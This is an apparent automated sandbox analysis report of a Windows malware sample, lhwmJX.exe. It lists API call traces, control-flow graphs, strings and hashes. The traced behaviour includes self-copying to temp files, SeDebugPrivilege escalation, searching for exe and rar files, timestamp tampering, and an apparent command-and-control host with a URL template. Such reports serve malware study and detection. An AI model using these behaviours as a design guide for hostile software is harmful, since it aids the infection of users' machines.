                                • PathFileExistsA.SHLWAPI(00BC4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1992
                                • CreateFileA.KERNEL32(00BC4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BC19BA
                                • Sleep.KERNEL32(00000064), ref: 00BC19C6
                                • wsprintfA.USER32 ref: 00BC19EC
                                • CopyFileA.KERNEL32(00BC4E5C,?,00000000), ref: 00BC1A00
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC1A1E
                                • GetFileSize.KERNEL32(00BC4E5C,00000000), ref: 00BC1A2C
                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BC1A46
                                • ReadFile.KERNEL32(00BC4E5C,00BC4E60,00000000,?,00000000), ref: 00BC1A65
                                • CloseHandle.KERNEL32(000000FF), ref: 00BC1A90
                                • DeleteFileA.KERNEL32(?), ref: 00BC1AA7
                                • VirtualFree.KERNEL32(00BC4E60,00000000,00008000), ref: 00BC1AC1
                                Strings
                                • %s%.8X.data, xrefs: 00BC19E6
                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC19DB
                                • 2, xrefs: 00BC19CF
                                • C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC197C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                • String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
                                • API String ID: 716042067-2743700173
                                • Opcode ID: 5bb2dae04baeb20c3e9f79518d5387bf748ed68e3cd225561df08a086f0616a4
                                • Instruction ID: 14821862b03c770ce96660a32fb54951422aaf17615dbfd9cffe461872a206c2
                                • Opcode Fuzzy Hash: 5bb2dae04baeb20c3e9f79518d5387bf748ed68e3cd225561df08a086f0616a4
                                • Instruction Fuzzy Hash: FF515B71901219AFDB109F98CC84FAEBBF8EB0A754F5049ADF525F6191C7309E40CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 150 bc28b8-bc28ff memset wsprintfA 151 bc29db-bc29df 150->151 152 bc2905-bc290d 150->152 152->151 153 bc2913-bc2919 152->153 154 bc291b-bc294c memset wsprintfA call bc29e2 153->154 155 bc2956-bc2965 strrchr 153->155 158 bc2951 154->158 155->151 157 bc2967-bc2978 lstrcmpiA 155->157 159 bc2988-bc2992 lstrcmpiA 157->159 160 bc297a-bc2981 call bc1e6e 157->160 158->151 159->151 162 bc2994-bc299b 159->162 163 bc2986 160->163 164 bc29ad-bc29c9 strstr 162->164 165 bc299d-bc29a3 162->165 163->151 167 bc29cb-bc29d1 call bc239d 164->167 168 bc29d3-bc29d6 call bc2692 164->168 165->164 166 bc29a5-bc29a7 lstrcpy 165->166 166->164 167->151 168->151
                                APIs
                                • memset.MSVCRT ref: 00BC28D3
                                • wsprintfA.USER32 ref: 00BC28F7
                                • memset.MSVCRT ref: 00BC2925
                                • wsprintfA.USER32 ref: 00BC2940
                                  • Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2A02
                                  • Part of subcall function 00BC29E2: wsprintfA.USER32 ref: 00BC2A1A
                                  • Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2A44
                                  • Part of subcall function 00BC29E2: lstrlen.KERNEL32(?), ref: 00BC2A54
                                  • Part of subcall function 00BC29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00BC2A6C
                                  • Part of subcall function 00BC29E2: strrchr.MSVCRT ref: 00BC2A7C
                                  • Part of subcall function 00BC29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00BC2A9F
                                  • Part of subcall function 00BC29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00BC2AAE
                                  • Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2AC6
                                  • Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2ADA
                                  • Part of subcall function 00BC29E2: FindFirstFileA.KERNEL32(?,?), ref: 00BC2AEF
                                  • Part of subcall function 00BC29E2: memset.MSVCRT ref: 00BC2B13
                                • strrchr.MSVCRT ref: 00BC2959
                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 00BC2974
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                • String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
                                • API String ID: 3004273771-4092107658
                                • Opcode ID: 1eb0fe17bd3034ddd2d33169ad7a7ce8777525bfd54ad49be8b5b1fc7233c3d7
                                • Instruction ID: 0c56521a5a1e3b9f523060104fb4cffd1bad2f7334c892c5597fa8a6a714c94a
                                • Opcode Fuzzy Hash: 1eb0fe17bd3034ddd2d33169ad7a7ce8777525bfd54ad49be8b5b1fc7233c3d7
                                • Instruction Fuzzy Hash: 3131A776A4030D6BDB20A764DC85FDA77ECEB15710F0444EAF945A7091EAF49AC48B60

                                Control-flow Graph

                                APIs
                                • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00BC164F
                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00BC165B
                                • GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,00000104), ref: 00BC166E
                                • CreateThread.KERNEL32(00000000,00000000,00BC1099,00000000,00000000,00000000), ref: 00BC16AC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00BC16BD
                                  • Part of subcall function 00BC139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC13BC
                                  • Part of subcall function 00BC139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BC13DA
                                  • Part of subcall function 00BC139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BC1448
                                • lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC16E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$C:\Windows\system32$Documents and Settings
                                • API String ID: 123563730-3269788485
                                • Opcode ID: ba44d8c163e7abd363f5cfd88dae470f818cc4911f2ac4d076b781a90b4ed921
                                • Instruction ID: 9c9818a5dcfb318ff7332b960d36de10eca3401f2be682c004c2e301a3b864f9
                                • Opcode Fuzzy Hash: ba44d8c163e7abd363f5cfd88dae470f818cc4911f2ac4d076b781a90b4ed921
                                • Instruction Fuzzy Hash: CF11B9735412147BDB206BA99D4DFDB3EEDEB5B761F1044A9F209A2061CB718A40C7B1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 205 bc1000-bc1023 CreateFileA 206 bc1025-bc1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 bc1092-bc1096 205->207 208 bc107b-bc1085 206->208 209 bc1057-bc105f 206->209 210 bc108d-bc1091 CloseHandle 208->210 211 bc1087-bc108b CloseHandle 208->211 212 bc1074-bc1075 UnmapViewOfFile 209->212 213 bc1061-bc106e call bc17d0 209->213 210->207 211->210 212->208 213->212
                                APIs
                                • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC1018
                                • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC1029
                                • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00BC1038
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC104B
                                • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC1075
                                • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC108B
                                • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BC10E8,?), ref: 00BC108E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 1223616889-3273462101
                                • Opcode ID: af15dce3f2a6473452844c2cfd71a4ca65cf0bfb38e3cb344f397a6203292832
                                • Instruction ID: 2ab4cf7a9d2c3ffbdd7580187a5b64a45e2b59774475996475ed0a4845922184
                                • Opcode Fuzzy Hash: af15dce3f2a6473452844c2cfd71a4ca65cf0bfb38e3cb344f397a6203292832
                                • Instruction Fuzzy Hash: 820184B210025CBFE7306F649C88F2BBBECEB44BA9F004929F245A3091DA705E448B74

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 375 bc2c48-bc2c75 memset call bc1973 378 bc2c77-bc2c7f 375->378 379 bc2cb2-bc2cb9 375->379 380 bc2c8f-bc2cac CreateThread WaitForMultipleObjects 378->380 381 bc2c81-bc2c8b 378->381 382 bc2cc8-bc2ccc 379->382 383 bc2cbb-bc2cc2 VirtualFree 379->383 380->379 381->380 383->382
                                APIs
                                • memset.MSVCRT ref: 00BC2C57
                                  • Part of subcall function 00BC1973: PathFileExistsA.SHLWAPI(00BC4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1992
                                  • Part of subcall function 00BC1973: CreateFileA.KERNEL32(00BC4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BC19BA
                                  • Part of subcall function 00BC1973: Sleep.KERNEL32(00000064), ref: 00BC19C6
                                  • Part of subcall function 00BC1973: wsprintfA.USER32 ref: 00BC19EC
                                  • Part of subcall function 00BC1973: CopyFileA.KERNEL32(00BC4E5C,?,00000000), ref: 00BC1A00
                                  • Part of subcall function 00BC1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC1A1E
                                  • Part of subcall function 00BC1973: GetFileSize.KERNEL32(00BC4E5C,00000000), ref: 00BC1A2C
                                  • Part of subcall function 00BC1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BC1A46
                                  • Part of subcall function 00BC1973: ReadFile.KERNEL32(00BC4E5C,00BC4E60,00000000,?,00000000), ref: 00BC1A65
                                • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00BC2C99
                                • WaitForMultipleObjects.KERNEL32(00000001,00BC16BA,00000001,000000FF,?,00BC16BA,00000000), ref: 00BC2CAC
                                • VirtualFree.KERNEL32(008E0000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,00BC4E5C,00BC4E60,?,00BC16BA,00000000), ref: 00BC2CC2
                                Strings
                                • C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC2C69
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                • String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
                                • API String ID: 2042498389-3390243486
                                • Opcode ID: abaf4ffafab02c0e0661b0d512f6008794c4b24c26b3a0c78c94704567b3c4c7
                                • Instruction ID: 9ff08c84c1775bc82fb8f397d9325b3e13a93760c93f4e9006971df4f33e2634
                                • Opcode Fuzzy Hash: abaf4ffafab02c0e0661b0d512f6008794c4b24c26b3a0c78c94704567b3c4c7
                                • Instruction Fuzzy Hash: EF01DF726012207AD714ABA4DC1AFEF7EECEF05B20F408058B904D61D1DAA09A40C3F0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 384 bc14e1-bc14fb 385 bc14fd-bc1510 GetModuleHandleA 384->385 386 bc1541-bc1547 384->386 387 bc151a-bc1535 VirtualQuery 385->387 388 bc1512-bc1518 385->388 389 bc1549-bc154c 386->389 390 bc1573-bc1574 call bc1638 386->390 392 bc153b 387->392 393 bc1537-bc1539 387->393 388->386 394 bc154e-bc1555 389->394 395 bc1569-bc1570 389->395 397 bc1579-bc157a ExitProcess 390->397 392->386 393->386 393->392 394->395 396 bc1557-bc1566 call bc1af9 394->396 396->395
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000), ref: 00BC1504
                                • VirtualQuery.KERNEL32(00BC14E1,?,0000001C), ref: 00BC1525
                                • ExitProcess.KERNEL32 ref: 00BC157A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: ExitHandleModuleProcessQueryVirtual
                                • String ID:
                                • API String ID: 3946701194-0
                                • Opcode ID: 97476ef189c7229bcb3ce5d4c59c2aa0c7f44aa0dd28f531d792be47bf7a2d15
                                • Instruction ID: 7e87bdae122db52e1c3ec432fa2a7ec897ee019ed717d7b05e83abbb5578e21f
                                • Opcode Fuzzy Hash: 97476ef189c7229bcb3ce5d4c59c2aa0c7f44aa0dd28f531d792be47bf7a2d15
                                • Instruction Fuzzy Hash: 2B115E71900204DFCB10EFADA895F7977E8EB9A711B10847EF403E3252DB308E41ABA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 400 bc1915-bc1922 401 bc1928-bc192c 400->401 402 bc1924-bc1926 400->402 404 bc192e-bc194d memset GetFileTime 401->404 405 bc194f-bc1952 401->405 403 bc196e-bc1970 402->403 406 bc1966-bc1968 404->406 405->403 407 bc1954-bc1960 SetFileTime 405->407 408 bc196c 406->408 409 bc196a 406->409 407->406 408->403 409->408
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: FileTimememset
                                • String ID:
                                • API String ID: 176422537-0
                                • Opcode ID: 0fec96a97cc76ad7b5bb1ec36b29b27f3a0bd9c98cc139352299c53c0ca21118
                                • Instruction ID: f801365a379909172d31017c07f06928a509f8053e2c4545e02fb26ce3ab1bbd
                                • Opcode Fuzzy Hash: 0fec96a97cc76ad7b5bb1ec36b29b27f3a0bd9c98cc139352299c53c0ca21118
                                • Instruction Fuzzy Hash: 2CF06832200209ABD760DE2ADC04FA777ECEB55761F00897EF556E1051EB70D646CBB0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 410 bc6159-bc615d 411 bc615f-bc6189 VirtualFree 410->411 412 bc618c-bc6192 411->412 413 bc6198-bc61b0 VirtualFree 412->413 414 bc60c7-bc60cf 412->414 416 bc61ba-bc61c8 413->416 417 bc61b2-bc61b4 413->417 414->412 415 bc60d5-bc60f8 VirtualAlloc 414->415 435 bc60fe-bc6106 415->435 436 bc60fa-bc60fc call bc66c8 415->436 419 bc61ca-bc61d7 416->419 420 bc6243-bc6251 416->420 417->416 424 bc61dd-bc61e0 419->424 422 bc6264-bc626f 420->422 423 bc6253 420->423 427 bc6271-bc6276 422->427 426 bc6255-bc6258 423->426 424->420 428 bc61e2-bc61f2 424->428 426->422 430 bc625a-bc6262 426->430 431 bc627c-bc6289 427->431 432 bc6389-bc63b1 VirtualProtect 427->432 433 bc61f5-bc61fe 428->433 430->426 452 bc628b 431->452 453 bc6292-bc6298 431->453 434 bc63b7-bc63ba 432->434 437 bc620c-bc6219 433->437 438 bc6200-bc6203 433->438 440 bc63fc-bc6416 VirtualProtect 434->440 441 bc63bc-bc63c2 434->441 443 bc6108-bc611d 435->443 444 bc6155 435->444 436->435 439 bc6238-bc623f 437->439 446 bc621b-bc6228 438->446 447 bc6205-bc6208 438->447 439->433 449 bc6241 439->449 457 bc6418-bc641d 440->457 458 bc6420-bc6425 440->458 441->441 448 bc63c4 441->448 450 bc611f-bc6121 443->450 444->411 446->439 454 bc622a-bc6236 447->454 455 bc620a 447->455 448->440 459 bc63c6-bc63cf 448->459 449->424 460 bc6151-bc6154 450->460 461 bc6123 450->461 452->453 456 bc62a2-bc62ac 453->456 454->439 455->439 462 bc62ae 456->462 463 bc62b1-bc62c8 456->463 464 bc63d4-bc63d8 459->464 465 bc63d1 459->465 460->444 461->460 466 bc6125-bc6128 461->466 462->463 467 bc62ce-bc62d4 463->467 468 bc6373-bc6384 463->468 469 bc63dd-bc63e1 464->469 470 bc63da 464->470 465->464 471 bc612a-bc612e 466->471 472 bc6134-bc613b 466->472 474 bc62da-bc62f1 467->474 475 bc62d6-bc62d9 467->475 468->427 476 bc63e7-bc63fa VirtualProtect 469->476 477 bc63e3 469->477 470->469 471->472 480 bc6130-bc6132 471->480 479 bc613d-bc614f 472->479 472->480 482 bc6365-bc636e 474->482 483 bc62f3-bc62f9 474->483 475->474 476->434 476->440 477->476 479->450 480->450 482->456 484 bc62fb-bc630f 483->484 485 bc6314-bc6326 483->485 486 bc6426-bc64a9 484->486 487 bc634c-bc6360 485->487 488 bc6328-bc634a 485->488 497 bc6519-bc651c 486->497 498 bc64ab-bc64c0 486->498 487->486 488->482 499 bc651d-bc651e 497->499 500 bc6583-bc6587 497->500 502 bc6535-bc6537 498->502 503 bc64c2 498->503 505 bc6522-bc6533 499->505 504 bc6588-bc658b 500->504 506 bc6539 502->506 507 bc659a 502->507 508 bc64f8 503->508 509 bc64c5-bc64cd 503->509 510 bc658d-bc658f 504->510 511 bc65a1-bc65a3 504->511 505->502 512 bc653b-bc6541 506->512 513 bc65b4 506->513 514 bc659b-bc659d 507->514 517 bc656c-bc656f 508->517 518 bc64fa-bc64fe 508->518 515 bc64cf-bc64d4 509->515 516 bc6542-bc6545 509->516 519 bc6591-bc6593 510->519 512->516 525 bc65be-bc6608 513->525 514->519 521 bc659f 514->521 522 bc64d6-bc64d9 515->522 523 bc6517-bc6518 515->523 524 bc654d-bc6550 516->524 526 bc6572 517->526 518->526 527 bc6500 518->527 519->514 520 bc6595 519->520 520->507 521->504 522->524 528 bc64db-bc64f5 522->528 523->497 524->525 529 bc6552-bc6556 524->529 531 bc6573-bc6576 526->531 527->505 532 bc6502 527->532 528->508 533 bc6578-bc657f 529->533 534 bc6558-bc6569 529->534 531->533 532->531 535 bc6504-bc6513 532->535 533->500 534->517 535->502 537 bc6515 535->537 537->523
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BC60DF
                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BC6189
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BC61A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: Virtual$Free$Alloc
                                • String ID:
                                • API String ID: 1852963964-0
                                • Opcode ID: 0cff6caa181df417e9e241f4614f495df2db0bb44e5a30207211a4435459ba00
                                • Instruction ID: eaba7a30525f325900465ff59cbf61d93348ba2aef3b8fa70f1409ea1c4725cc
                                • Opcode Fuzzy Hash: 0cff6caa181df417e9e241f4614f495df2db0bb44e5a30207211a4435459ba00
                                • Instruction Fuzzy Hash: 26213432A006498FCB318F58CC81BED37E2EF45301F69046DDE8AAF291DA716A50CB94
                                APIs
                                • GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,?,?,00BC13EF), ref: 00BC11AB
                                • OpenProcessToken.ADVAPI32(00000000,00000028,00BC13EF,?,?,?,?,?,?,00BC13EF), ref: 00BC11BB
                                • AdjustTokenPrivileges.ADVAPI32(00BC13EF,00000000,?,00000010,00000000,00000000), ref: 00BC11EB
                                • CloseHandle.KERNEL32(00BC13EF), ref: 00BC11FA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BC13EF), ref: 00BC1203
                                Strings
                                • C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC11A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                • String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
                                • API String ID: 75692138-3390243486
                                • Opcode ID: 5f201dff3b033448ff8304073a4bdc56b608e87eaa50592b91730404209a99e2
                                • Instruction ID: 66088fc2d43abe2a838e20ab6b6a14ab430b3a40a848c406c3bc85c261736e55
                                • Opcode Fuzzy Hash: 5f201dff3b033448ff8304073a4bdc56b608e87eaa50592b91730404209a99e2
                                • Instruction Fuzzy Hash: AB01E876900209EFDB00DFD4CD89EAEBBF8FB08705F508469E605A2151DB719F449B50
                                APIs
                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC13BC
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BC13DA
                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BC1448
                                  • Part of subcall function 00BC119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,?,?,00BC13EF), ref: 00BC11AB
                                  • Part of subcall function 00BC119F: OpenProcessToken.ADVAPI32(00000000,00000028,00BC13EF,?,?,?,?,?,?,00BC13EF), ref: 00BC11BB
                                  • Part of subcall function 00BC119F: AdjustTokenPrivileges.ADVAPI32(00BC13EF,00000000,?,00000010,00000000,00000000), ref: 00BC11EB
                                  • Part of subcall function 00BC119F: CloseHandle.KERNEL32(00BC13EF), ref: 00BC11FA
                                  • Part of subcall function 00BC119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BC13EF), ref: 00BC1203
                                Strings
                                • C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC13A8
                                • SeDebugPrivilege, xrefs: 00BC13D3
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                • String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$SeDebugPrivilege
                                • API String ID: 4123949106-4209104298
                                • Opcode ID: f696beb62abceefa5fee85aefb455b96f5dc3728a8c7cd0a31d753d2176a88d5
                                • Instruction ID: 98a6daf9b84402f5d0690927e27eaff0e91e15c33d289fe7c479687f40b53cba
                                • Opcode Fuzzy Hash: f696beb62abceefa5fee85aefb455b96f5dc3728a8c7cd0a31d753d2176a88d5
                                • Instruction Fuzzy Hash: 4D313271D00249AAEF20EBA9CC45FEEBBF8EB86704F2045ADE504B2242D6705E45CF60
                                APIs
                                • strstr.MSVCRT ref: 00BC23CC
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BC2464
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00BC2472
                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00BC24A8
                                • memset.MSVCRT ref: 00BC24B9
                                • strrchr.MSVCRT ref: 00BC24C9
